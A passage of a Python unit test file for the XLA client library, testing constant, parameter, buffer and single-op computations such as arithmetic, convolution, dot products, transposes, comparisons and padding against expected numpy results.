"""Convenience wrapper to create Numpy arrays with a np.int32 dtype."""
return np.array(*args, dtype=np.int32, **kwargs)
def NumpyArrayS64(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.int64 dtype."""
return np.array(*args, dtype=np.int64, **kwargs)
def NumpyArrayBool(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.bool dtype."""
return np.array(*args, dtype=np.bool, **kwargs)
class ComputationsWithConstantsTest(LocalComputationTest):
"""Tests focusing on Constant ops."""
def testConstantScalarSumF32(self):
c = self._NewComputation()
root = c.Add(c.ConstantF32Scalar(1.11), c.ConstantF32Scalar(3.14))
self.assertEqual(c.GetShape(root), c.GetReturnValueShape())
self._ExecuteAndCompareClose(c, expected=4.25)
def testConstantScalarSumF64(self):
c = self._NewComputation()
c.Add(c.ConstantF64Scalar(1.11), c.ConstantF64Scalar(3.14))
self._ExecuteAndCompareClose(c, expected=4.25)
def testConstantScalarSumS32(self):
c = self._NewComputation()
c.Add(c.ConstantS32Scalar(1), c.ConstantS32Scalar(2))
self._ExecuteAndCompareClose(c, expected=3)
def testConstantScalarSumS64(self):
c = self._NewComputation()
c.Add(c.ConstantS64Scalar(1), c.ConstantS64Scalar(2))
self._ExecuteAndCompareClose(c, expected=3)
def testConstantVectorMulF32(self):
c = self._NewComputation()
c.Mul(
c.Constant(NumpyArrayF32([2.5, 3.3, -1.2, 0.7])),
c.Constant(NumpyArrayF32([-1.2, 2, -2, -3])))
self._ExecuteAndCompareClose(c, expected=[-3, 6.6, 2.4, -2.1])
def testConstantVectorMulF64(self):
c = self._NewComputation()
c.Mul(
c.Constant(NumpyArrayF64([2.5, 3.3, -1.2, 0.7])),
c.Constant(NumpyArrayF64([-1.2, 2, -2, -3])))
self._ExecuteAndCompareClose(c, expected=[-3, 6.6, 2.4, -2.1])
def testConstantVectorScalarDivF32(self):
c = self._NewComputation()
c.Div(
c.Constant(NumpyArrayF32([1.5, 2.5, 3.0, -10.8])),
c.ConstantF32Scalar(2.0))
self._ExecuteAndCompareClose(c, expected=[0.75, 1.25, 1.5, -5.4])
def testConstantVectorScalarDivF64(self):
c = self._NewComputation()
c.Div(
c.Constant(NumpyArrayF64([1.5, 2.5, 3.0, -10.8])),
c.ConstantF64Scalar(2.0))
self._ExecuteAndCompareClose(c, expected=[0.75, 1.25, 1.5, -5.4])
def testConstantVectorScalarPowF32(self):
c = self._NewComputation()
c.Pow(c.Constant(NumpyArrayF32([1.5, 2.5, 3.0])), c.ConstantF32Scalar(2.))
self._ExecuteAndCompareClose(c, expected=[2.25, 6.25, 9.])
def testConstantVectorScalarPowF64(self):
c = self._NewComputation()
c.Pow(c.Constant(NumpyArrayF64([1.5, 2.5, 3.0])), c.ConstantF64Scalar(2.))
self._ExecuteAndCompareClose(c, expected=[2.25, 6.25, 9.])
def testBooleanAnd(self):
c = self._NewComputation()
c.And(
c.Constant(NumpyArrayBool([True, False, True, False])),
c.Constant(NumpyArrayBool([True, True, False, False])))
self._ExecuteAndCompareExact(c, expected=[True, False, False, False])
def testBooleanOr(self):
c = self._NewComputation()
c.Or(
c.Constant(NumpyArrayBool([True, False, True, False])),
c.Constant(NumpyArrayBool([True, True, False, False])))
self._ExecuteAndCompareExact(c, expected=[True, True, True, False])
def testBooleanXor(self):
c = self._NewComputation()
c.Xor(
c.Constant(NumpyArrayBool([True, False, True, False])),
c.Constant(NumpyArrayBool([True, True, False, False])))
self._ExecuteAndCompareExact(c, expected=[False, True, True, False])
def testSum2DF32(self):
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6]])),
c.Constant(NumpyArrayF32([[1, -1, 1], [-1, 1, -1]])))
self._ExecuteAndCompareClose(c, expected=[[2, 1, 4], [3, 6, 5]])
def testShiftLeft(self):
c = self._NewComputation()
c.ShiftLeft(c.Constant(NumpyArrayS32([3])),
c.Constant(NumpyArrayS32([2])))
self._ExecuteAndCompareClose(c, expected=[12])
def testShiftRightArithmetic(self):
c = self._NewComputation()
c.ShiftRightArithmetic(c.Constant(NumpyArrayS32([-2])),
c.Constant(NumpyArrayS32([1])))
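    # An arithmetic shift copies the sign bit, so -2 >> 1 yields -1.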
self._ExecuteAndCompareClose(c, expected=[-1])
def testShiftRightLogical(self):
c = self._NewComputation()
c.ShiftRightLogical(c.Constant(NumpyArrayS32([-1])),
c.Constant(NumpyArrayS32([1])))
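    # A logical shift treats the int32 bit pattern of -1 (0xFFFFFFFF) as unsigned,
    # so shifting right by one gives 0x7FFFFFFF, i.e. 2**31 - 1.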
self._ExecuteAndCompareClose(c, expected=[2**31 - 1])
def testGetProto(self):
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6]])),
c.Constant(NumpyArrayF32([[1, -1, 1], [-1, 1, -1]])))
built = c.Build()
proto = built.GetProto() # HloModuleProto
self.assertTrue(len(proto.computations) == 1)
self.assertTrue(len(proto.computations[0].instructions) == 3)
def testSum2DF64(self):
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF64([[1, 2, 3], [4, 5, 6]])),
c.Constant(NumpyArrayF64([[1, -1, 1], [-1, 1, -1]])))
self._ExecuteAndCompareClose(c, expected=[[2, 1, 4], [3, 6, 5]])
def testSum2DWith1DBroadcastDim0F32(self):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 0 to match the former's shape.
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF32([10, 20, 30])),
broadcast_dimensions=(0,))
self._ExecuteAndCompareClose(
c, expected=[[11, 12, 13], [24, 25, 26], [37, 38, 39]])
def testSum2DWith1DBroadcastDim0F64(self):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 0 to match the former's shape.
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF64([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF64([10, 20, 30])),
broadcast_dimensions=(0,))
self._ExecuteAndCompareClose(
c, expected=[[11, 12, 13], [24, 25, 26], [37, 38, 39]])
def testSum2DWith1DBroadcastDim1F32(self):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 1 to match the former's shape.
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF32([10, 20, 30])),
broadcast_dimensions=(1,))
self._ExecuteAndCompareClose(
c, expected=[[11, 22, 33], [14, 25, 36], [17, 28, 39]])
def testSum2DWith1DBroadcastDim1F64(self):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 1 to match the former's shape.
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF64([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF64([10, 20, 30])),
broadcast_dimensions=(1,))
self._ExecuteAndCompareClose(
c, expected=[[11, 22, 33], [14, 25, 36], [17, 28, 39]])
def testConstantAxpyF32(self):
c = self._NewComputation()
c.Add(
c.Mul(
c.ConstantF32Scalar(2),
c.Constant(NumpyArrayF32([2.2, 3.3, 4.4, 5.5]))),
c.Constant(NumpyArrayF32([100, -100, 200, -200])))
self._ExecuteAndCompareClose(c, expected=[104.4, -93.4, 208.8, -189])
def testConstantAxpyF64(self):
c = self._NewComputation()
c.Add(
c.Mul(
c.ConstantF64Scalar(2),
c.Constant(NumpyArrayF64([2.2, 3.3, 4.4, 5.5]))),
c.Constant(NumpyArrayF64([100, -100, 200, -200])))
self._ExecuteAndCompareClose(c, expected=[104.4, -93.4, 208.8, -189])
class ParametersTest(LocalComputationTest):
"""Tests focusing on Parameter ops and argument-passing."""
def setUp(self):
self.f32_scalar_2 = NumpyArrayF32(2.0)
self.f32_4vector = NumpyArrayF32([-2.3, 3.3, -4.3, 5.3])
self.f64_scalar_2 = NumpyArrayF64(2.0)
self.f64_4vector = NumpyArrayF64([-2.3, 3.3, -4.3, 5.3])
self.s32_scalar_3 = NumpyArrayS32(3)
self.s32_4vector = NumpyArrayS32([10, 15, -2, 7])
self.s64_scalar_3 = NumpyArrayS64(3)
self.s64_4vector = NumpyArrayS64([10, 15, -2, 7])
def testScalarTimesVectorAutonumberF32(self):
c = self._NewComputation()
p0 = c.ParameterFromNumpy(self.f32_scalar_2)
p1 = c.ParameterFromNumpy(self.f32_4vector)
c.Mul(p0, p1)
self._ExecuteAndCompareClose(
c,
arguments=[self.f32_scalar_2, self.f32_4vector],
expected=[-4.6, 6.6, -8.6, 10.6])
def testScalarTimesVectorAutonumberF64(self):
c = self._NewComputation()
p0 = c.ParameterFromNumpy(self.f64_scalar_2)
p1 = c.ParameterFromNumpy(self.f64_4vector)
c.Mul(p0, p1)
self._ExecuteAndCompareClose(
c,
arguments=[self.f64_scalar_2, self.f64_4vector],
expected=[-4.6, 6.6, -8.6, 10.6])
def testScalarTimesVectorS32(self):
c = self._NewComputation()
p0 = c.ParameterFromNumpy(self.s32_scalar_3)
p1 = c.ParameterFromNumpy(self.s32_4vector)
c.Mul(p0, p1)
self._ExecuteAndCompareExact(
c,
arguments=[self.s32_scalar_3, self.s32_4vector],
expected=[30, 45, -6, 21])
def testScalarTimesVectorS64(self):
c = self._NewComputation()
p0 = c.ParameterFromNumpy(self.s64_scalar_3)
p1 = c.ParameterFromNumpy(self.s64_4vector)
c.Mul(p0, p1)
self._ExecuteAndCompareExact(
c,
arguments=[self.s64_scalar_3, self.s64_4vector],
expected=[30, 45, -6, 21])
def testScalarMinusVectorExplicitNumberingF32(self):
# Use explicit numbering and pass parameter_num first. Sub is used since
# it's not commutative and can help catch parameter reversal within the
# computation.
c = self._NewComputation()
p1 = c.ParameterFromNumpy(self.f32_4vector, parameter_num=1)
p0 = c.ParameterFromNumpy(self.f32_scalar_2, parameter_num=0)
c.Sub(p1, p0)
self._ExecuteAndCompareClose(
c,
arguments=[self.f32_scalar_2, self.f32_4vector],
expected=[-4.3, 1.3, -6.3, 3.3])
def testScalarMinusVectorExplicitNumberingF64(self):
# Use explicit numbering and pass parameter_num first. Sub is used since
# it's not commutative and can help catch parameter reversal within the
# computation.
c = self._NewComputation()
p1 = c.ParameterFromNumpy(self.f64_4vector, parameter_num=1)
p0 = c.ParameterFromNumpy(self.f64_scalar_2, parameter_num=0)
c.Sub(p1, p0)
self._ExecuteAndCompareClose(
c,
arguments=[self.f64_scalar_2, self.f64_4vector],
expected=[-4.3, 1.3, -6.3, 3.3])
class LocalBufferTest(LocalComputationTest):
"""Tests focusing on execution with LocalBuffers."""
def _Execute(self, c, arguments):
compiled_c = c.Build().CompileWithExampleArguments(arguments)
arg_buffers = [xla_client.LocalBuffer.from_pyval(arg) for arg in arguments]
result_buffer = compiled_c.ExecuteWithLocalBuffers(arg_buffers)
return result_buffer.to_py()
def testConstantSum(self):
c = self._NewComputation()
c.Add(c.ConstantF32Scalar(1.11), c.ConstantF32Scalar(3.14))
self._ExecuteAndCompareClose(c, expected=4.25)
def testOneParameterSum(self):
c = self._NewComputation()
c.Add(c.ParameterFromNumpy(NumpyArrayF32(0.)), c.ConstantF32Scalar(3.14))
self._ExecuteAndCompareClose(
c,
arguments=[NumpyArrayF32(1.11)],
expected=4.25)
def testTwoParameterSum(self):
c = self._NewComputation()
c.Add(c.ParameterFromNumpy(NumpyArrayF32(0.)),
c.ParameterFromNumpy(NumpyArrayF32(0.)))
self._ExecuteAndCompareClose(
c,
arguments=[NumpyArrayF32(1.11), NumpyArrayF32(3.14)],
expected=4.25)
def testCannotCallWithDeletedBuffers(self):
c = self._NewComputation()
c.Add(c.ParameterFromNumpy(NumpyArrayF32(0.)), c.ConstantF32Scalar(3.14))
arg = NumpyArrayF32(1.11)
compiled_c = c.Build().CompileWithExampleArguments([arg])
arg_buffer = xla_client.LocalBuffer.from_pyval(arg)
arg_buffer.delete()
with self.assertRaises(ValueError):
compiled_c.ExecuteWithLocalBuffers([arg_buffer])
def testDestructureTupleEmpty(self):
t = ()
local_buffer = xla_client.LocalBuffer.from_pyval(t)
pieces = local_buffer.destructure()
self.assertTrue(local_buffer.is_deleted())
self.assertEqual(len(pieces), 0)
def testDestructureTupleOneArrayElement(self):
t = (np.array([1, 2, 3, 4], dtype=np.int32),)
local_buffer = xla_client.LocalBuffer.from_pyval(t)
pieces = local_buffer.destructure()
self.assertTrue(local_buffer.is_deleted())
self.assertEqual(len(pieces), 1)
array = pieces[0]
got = array.to_py()
want = NumpyArrayS32([1, 2, 3, 4])
np.testing.assert_equal(want, got)
def testDestructureTupleTwoArrayElementDifferentType(self):
t = (np.array([1.0, 2.0, 3.0, 4.0], dtype=np.float32),
np.array([2, 3, 4, 5], dtype=np.int32))
local_buffer = xla_client.LocalBuffer.from_pyval(t)
pieces = local_buffer.destructure()
self.assertTrue(local_buffer.is_deleted())
self.assertEqual(len(pieces), 2)
array0, array1 = pieces
got = array0.to_py()
want = NumpyArrayF32([1.0, 2.0, 3.0, 4.0])
np.testing.assert_equal(want, got)
got = array1.to_py()
want = NumpyArrayS32([2, 3, 4, 5])
np.testing.assert_equal(want, got)
def testDestructureTupleNested(self):
t = ((NumpyArrayF32([1.0, 2.0]), NumpyArrayS32([3, 4])), NumpyArrayS32([5]))
local_buffer = xla_client.LocalBuffer.from_pyval(t)
pieces = local_buffer.destructure()
self.assertTrue(local_buffer.is_deleted())
self.assertEqual(len(pieces), 2)
tuple0, array1 = pieces
got = array1.to_py()
want = NumpyArrayS32([5])
np.testing.assert_equal(want, got)
got = tuple0.to_py()
self.assertEqual(type(got), tuple)
self.assertEqual(len(got), 2)
np.testing.assert_equal(NumpyArrayF32([1.0, 2.0]), got[0])
np.testing.assert_equal(NumpyArrayS32([3, 4]), got[1])
class SingleOpTest(LocalComputationTest):
"""Tests for single ops.
The goal here is smoke testing - to exercise the most basic functionality of
  single XLA ops. As few additional ops as possible are added
around the op being tested.
"""
def testConcatenateF32(self):
c = self._NewComputation()
c.Concatenate(
(c.Constant(NumpyArrayF32([1.0, 2.0, 3.0])),
c.Constant(NumpyArrayF32([4.0, 5.0, 6.0]))),
dimension=0)
self._ExecuteAndCompareClose(c, expected=[1.0, 2.0, 3.0, 4.0, 5.0, 6.0])
def testConcatenateF64(self):
c = self._NewComputation()
c.Concatenate(
(c.Constant(NumpyArrayF64([1.0, 2.0, 3.0])),
c.Constant(NumpyArrayF64([4.0, 5.0, 6.0]))),
dimension=0)
self._ExecuteAndCompareClose(c, expected=[1.0, 2.0, 3.0, 4.0, 5.0, 6.0])
def testConvertElementType(self):
xla_types = {
np.bool: xla_client.xla_data_pb2.PRED,
np.int32: xla_client.xla_data_pb2.S32,
np.int64: xla_client.xla_data_pb2.S64,
np.float32: xla_client.xla_data_pb2.F32,
np.float64: xla_client.xla_data_pb2.F64,
}
def _ConvertAndTest(template, src_dtype, dst_dtype):
c = self._NewComputation()
x = c.Constant(np.array(template, dtype=src_dtype))
c.ConvertElementType(x, xla_types[dst_dtype])
result = c.Build().Compile().Execute()
expected = np.array(template, dtype=dst_dtype)
self.assertEqual(result.shape, expected.shape)
self.assertEqual(result.dtype, expected.dtype)
np.testing.assert_equal(result, expected)
x = [0, 1, 0, 0, 1]
for src_dtype, dst_dtype in itertools.product(xla_types, xla_types):
_ConvertAndTest(x, src_dtype, dst_dtype)
def testBitcastConvertType(self):
xla_x32_types = {
np.int32: xla_client.xla_data_pb2.S32,
np.float32: xla_client.xla_data_pb2.F32,
}
xla_x64_types = {
np.int64: xla_client.xla_data_pb2.S64,
np.float64: xla_client.xla_data_pb2.F64,
}
def _ConvertAndTest(template, src_dtype, dst_dtype, dst_etype):
c = self._NewComputation()
x = c.Constant(np.array(template, dtype=src_dtype))
c.BitcastConvertType(x, dst_etype)
result = c.Build().Compile().Execute()
expected = np.array(template, src_dtype).view(dst_dtype)
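      # ndarray.view reinterprets the underlying bits without converting the
      # values, mirroring what BitcastConvertType does on the device.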
self.assertEqual(result.shape, expected.shape)
self.assertEqual(result.dtype, expected.dtype)
np.testing.assert_equal(result, expected)
x = [0, 1, 0, 0, 1]
for xla_types in [xla_x32_types, xla_x64_types]:
for src_dtype, dst_dtype in itertools.product(xla_types, xla_types):
_ConvertAndTest(x, src_dtype, dst_dtype, xla_types[dst_dtype])
def testCrossReplicaSumOneReplica(self):
samples = [
NumpyArrayF32(42.0),
NumpyArrayF32([97.0]),
NumpyArrayF32([64.0, 117.0]),
NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]]),
]
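    # With only one replica, the cross-replica sum reduces to the identity.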
for lhs in samples:
c = self._NewComputation()
c.CrossReplicaSum(c.Constant(lhs))
self._ExecuteAndCompareExact(c, expected=lhs)
def testDotMatrixVectorF32(self):
c = self._NewComputation()
lhs = NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]])
rhs = NumpyArrayF32([[10.0], [20.0]])
c.Dot(c.Constant(lhs), c.Constant(rhs))
self._ExecuteAndCompareClose(c, expected=np.dot(lhs, rhs))
def testDotMatrixVectorF64(self):
c = self._NewComputation()
lhs = NumpyArrayF64([[2.0, 3.0], [4.0, 5.0]])
rhs = NumpyArrayF64([[10.0], [20.0]])
c.Dot(c.Constant(lhs), c.Constant(rhs))
self._ExecuteAndCompareClose(c, expected=np.dot(lhs, rhs))
def testDotMatrixMatrixF32(self):
c = self._NewComputation()
lhs = NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]])
rhs = NumpyArrayF32([[10.0, 20.0], [100.0, 200.0]])
c.Dot(c.Constant(lhs), c.Constant(rhs))
self._ExecuteAndCompareClose(c, expected=np.dot(lhs, rhs))
def testDotMatrixMatrixF64(self):
c = self._NewComputation()
lhs = NumpyArrayF64([[2.0, 3.0], [4.0, 5.0]])
rhs = NumpyArrayF64([[10.0, 20.0], [100.0, 200.0]])
c.Dot(c.Constant(lhs), c.Constant(rhs))
self._ExecuteAndCompareClose(c, expected=np.dot(lhs, rhs))
def testDotGeneral(self):
c = self._NewComputation()
rng = np.random.RandomState(0)
lhs = NumpyArrayF32(rng.randn(10, 3, 4))
rhs = NumpyArrayF32(rng.randn(10, 4, 5))
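    # Tuple form: ((lhs_contracting_dims, rhs_contracting_dims), (lhs_batch_dims, rhs_batch_dims)).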
dimension_numbers = (([2], [1]), ([0], [0]))
c.DotGeneral(c.Constant(lhs), c.Constant(rhs), dimension_numbers)
self._ExecuteAndCompareClose(c, expected=np.matmul(lhs, rhs))
def testDotGeneralWithDotDimensionNumbersProto(self):
c = self._NewComputation()
rng = np.random.RandomState(0)
lhs = NumpyArrayF32(rng.randn(10, 3, 4))
rhs = NumpyArrayF32(rng.randn(10, 4, 5))
dimension_numbers = xla_client.xla_data_pb2.DotDimensionNumbers()
dimension_numbers.lhs_contracting_dimensions.append(2)
dimension_numbers.rhs_contracting_dimensions.append(1)
dimension_numbers.lhs_batch_dimensions.append(0)
dimension_numbers.rhs_batch_dimensions.append(0)
c.DotGeneral(c.Constant(lhs), c.Constant(rhs), dimension_numbers)
self._ExecuteAndCompareClose(c, expected=np.matmul(lhs, rhs))
def testConvF32Same(self):
c = self._NewComputation()
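    # Helper: an array of the given shape filled with 0, 1, 2, ... as float32.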
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 2, 3, 4)
rhs = a(1, 2, 1, 2) * 10
c.Conv(c.Constant(lhs), c.Constant(rhs),
[1, 1], xla_client.PaddingType.SAME)
result = np.array([[[[640., 700., 760., 300.],
[880., 940., 1000., 380.],
[1120., 1180., 1240., 460.]]]])
self._ExecuteAndCompareClose(c, expected=result)
def testConvF32Valid(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 2, 3, 4)
rhs = a(1, 2, 1, 2) * 10
c.Conv(c.Constant(lhs), c.Constant(rhs),
[2, 1], xla_client.PaddingType.VALID)
result = np.array([[[[640., 700., 760.],
[1120., 1180., 1240.]]]])
self._ExecuteAndCompareClose(c, expected=result)
def testConvWithGeneralPaddingF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 1, 2, 3)
rhs = a(1, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
c.ConvWithGeneralPadding(c.Constant(lhs), c.Constant(rhs),
strides, pads, lhs_dilation, rhs_dilation)
result = np.array([[[[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.]]]])
self._ExecuteAndCompareClose(c, expected=result)
def testConvGeneralDilatedF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 1, 2, 3)
rhs = a(1, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = ("NCHW", "OIHW", "NCHW")
c.ConvGeneralDilated(c.Constant(lhs), c.Constant(rhs),
strides, pads, lhs_dilation, rhs_dilation,
dimension_numbers)
result = np.array([[[[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.]]]])
self._ExecuteAndCompareClose(c, expected=result)
def testConvGeneralDilatedPermutedF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 1, 2, 3)
rhs = a(1, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = ("NHWC", "OIHW", "CWNH")
c.ConvGeneralDilated(c.Constant(np.transpose(lhs, (0, 2, 3, 1))),
c.Constant(rhs),
strides, pads, lhs_dilation, rhs_dilation,
dimension_numbers)
result = np.array([[[[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.]]]])
self._ExecuteAndCompareClose(c, expected=np.transpose(result, (1, 3, 0, 2)))
def testBooleanNot(self):
c = self._NewComputation()
arr = NumpyArrayBool([True, False, True])
c.Not(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=~arr)
def testExp(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Exp(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.exp(arr))
def testExpm1(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Expm1(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.expm1(arr))
def testRound(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Round(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.round(arr))
def testLog(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Log(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.log(arr))
def testLog1p(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Log1p(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.log1p(arr))
def testNeg(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Neg(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=-arr)
def testFloor(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Floor(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.floor(arr))
def testCeil(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Ceil(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.ceil(arr))
def testAbs(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, -12.1, 2.4, -1.])
c.Abs(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.abs(arr))
def testTanh(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Tanh(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.tanh(arr))
def testTrans(self):
def _TransposeAndTest(array):
c = self._NewComputation()
c.Trans(c.Constant(array))
self._ExecuteAndCompareClose(c, expected=array.T)
# Test square and non-square matrices in both default (C) and F orders.
for array_fun in [NumpyArrayF32, NumpyArrayF64]:
_TransposeAndTest(array_fun([[1, 2, 3], [4, 5, 6]]))
_TransposeAndTest(array_fun([[1, 2, 3], [4, 5, 6]], order="F"))
_TransposeAndTest(array_fun([[1, 2], [4, 5]]))
_TransposeAndTest(array_fun([[1, 2], [4, 5]], order="F"))
def testTranspose(self):
def _TransposeAndTest(array, permutation):
c = self._NewComputation()
c.Transpose(c.Constant(array), permutation)
expected = np.transpose(array, permutation)
self._ExecuteAndCompareClose(c, expected=expected)
_TransposeAndTest(NumpyArrayF32([[1, 2, 3], [4, 5, 6]]), [0, 1])
_TransposeAndTest(NumpyArrayF32([[1, 2, 3], [4, 5, 6]]), [1, 0])
_TransposeAndTest(NumpyArrayF32([[1, 2], [4, 5]]), [0, 1])
_TransposeAndTest(NumpyArrayF32([[1, 2], [4, 5]]), [1, 0])
arr = np.random.RandomState(0).randn(2, 3, 4).astype(np.float32)
for permutation in itertools.permutations(range(arr.ndim)):
_TransposeAndTest(arr, permutation)
_TransposeAndTest(np.asfortranarray(arr), permutation)
def testEq(self):
c = self._NewComputation()
c.Eq(
c.Constant(NumpyArrayS32([1, 2, 3, 4])),
c.Constant(NumpyArrayS32([4, 2, 3, 1])))
self._ExecuteAndCompareExact(c, expected=[False, True, True, False])
def testNe(self):
c = self._NewComputation()
c.Ne(
c.Constant(NumpyArrayS32([1, 2, 3, 4])),
c.Constant(NumpyArrayS32([4, 2, 3, 1])))
self._ExecuteAndCompareExact(c, expected=[True, False, False, True])
c.Ne(
c.Constant(NumpyArrayF32([-2.0, 0.0,
float("nan"),
float("nan")])),
c.Constant(NumpyArrayF32([2.0, -0.0, 1.0, float("nan")])))
self._ExecuteAndAssertWith(
np.testing.assert_allclose, c, (), expected=[True, False, True, True])
def testGt(self):
c = self._NewComputation()
c.Gt(
c.Constant(NumpyArrayS32([1, 2, 3, 4, 9])),
c.Constant(NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(c, expected=[False, True, True, False, False])
def testGe(self):
c = self._NewComputation()
c.Ge(
c.Constant(NumpyArrayS32([1, 2, 3, 4, 9])),
c.Constant(NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(c, expected=[True, True, True, False, False])
def testLt(self):
c = self._NewComputation()
c.Lt(
c.Constant(NumpyArrayS32([1, 2, 3, 4, 9])),
c.Constant(NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(c, expected=[False, False, False, True, True])
def testLe(self):
c = self._NewComputation()
c.Le(
c.Constant(NumpyArrayS32([1, 2, 3, 4, 9])),
c.Constant(NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(c, expected=[True, False, False, True, True])
def testMax(self):
c = self._NewComputation()
c.Max(
c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0, 9.0])),
c.Constant(NumpyArrayF32([1.0, 0.0, 2.0, 7.0, 12.0])))
self._ExecuteAndCompareExact(c, expected=[1.0, 2.0, 3.0, 7.0, 12.0])
def testMaxExplicitBroadcastDim0(self):
c = self._NewComputation()
c.Max(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF32([3, 4, 5])),
broadcast_dimensions=(0,))
self._ExecuteAndCompareExact(c, expected=[[3, 3, 3], [4, 5, 6], [7, 8, 9]])
def testMaxExplicitBroadcastDim1(self):
c = self._NewComputation()
c.Max(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF32([3, 4, 5])),
broadcast_dimensions=(1,))
self._ExecuteAndCompareExact(c, expected=[[3, 4, 5], [4, 5, 6], [7, 8, 9]])
def testMin(self):
c = self._NewComputation()
c.Min(
c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0, 9.0])),
c.Constant(NumpyArrayF32([1.0, 0.0, 2.0, 7.0, 12.0])))
self._ExecuteAndCompareExact(c, expected=[1.0, 0.0, 2.0, 4.0, 9.0])
def testPad(self):
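    # Each per-dimension spec is (edge_padding_low, edge_padding_high,
    # interior_padding).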
c = self._NewComputation()
c.Pad(
c.Constant(NumpyArrayF32([[1.0, 2.0], [3.0, 4.0]])),
c.Constant(NumpyArrayF32(0.0)),
[(1, 2, 1), (0, 1, 0)])
self._ExecuteAndCompareClose(c, expected=[[0.0, 0.0, 0.0],
[1.0, 2.0, 0.0],
[0.0, 0.0, 0.0],
[3.0, 4.0, 0.0],
[0.0, 0.0, 0.0],
[0.0, 0.0, 0.0]])
def testPadWithPaddingConfig(self):
c = self._NewComputation()
padding_config = xla_client.xla_data_pb2.PaddingConfig()
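    # Builds the same (low, high, interior) padding spec as testPad, but via
    # the PaddingConfig proto.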
for lo, hi, interior in [(1, 2, 1), (0, 1, 0)]:
dimension = padding_config.dimensions.add()
dimension.edge_padding_low = lo
dimension.edge_padding_high = hi
dimension.interior_padding = interior
c.Pad(
c.Constant(NumpyArrayF32([[1.0, 2.0], [3.0, 4.0]])),
c.Constant(NumpyArrayF32(0.0)),
padding_config)
self._ExecuteAndCompareClose(c, expected=[[0.0, 0.0, 0.0],
[1.0, 2.0, 0.0],
[0.0, 0.0, 0.0],
[3.0, 4.0, 0.0],
[0.0, 0.0, 0.0],
[0.0, 0.0, 0.0]])
def testReshape(self):
c = self._NewComputation()
c.Reshape(
c.Constant(NumpyArrayS32([[1, 2], [3, 4], [5, 6]])),
dimensions=[0, 1],
new_sizes=[2, 3])
self._ExecuteAndCompareExact(c, expected=[[1, 2, 3], [4, 5, 6]])
def testCollapse(self):
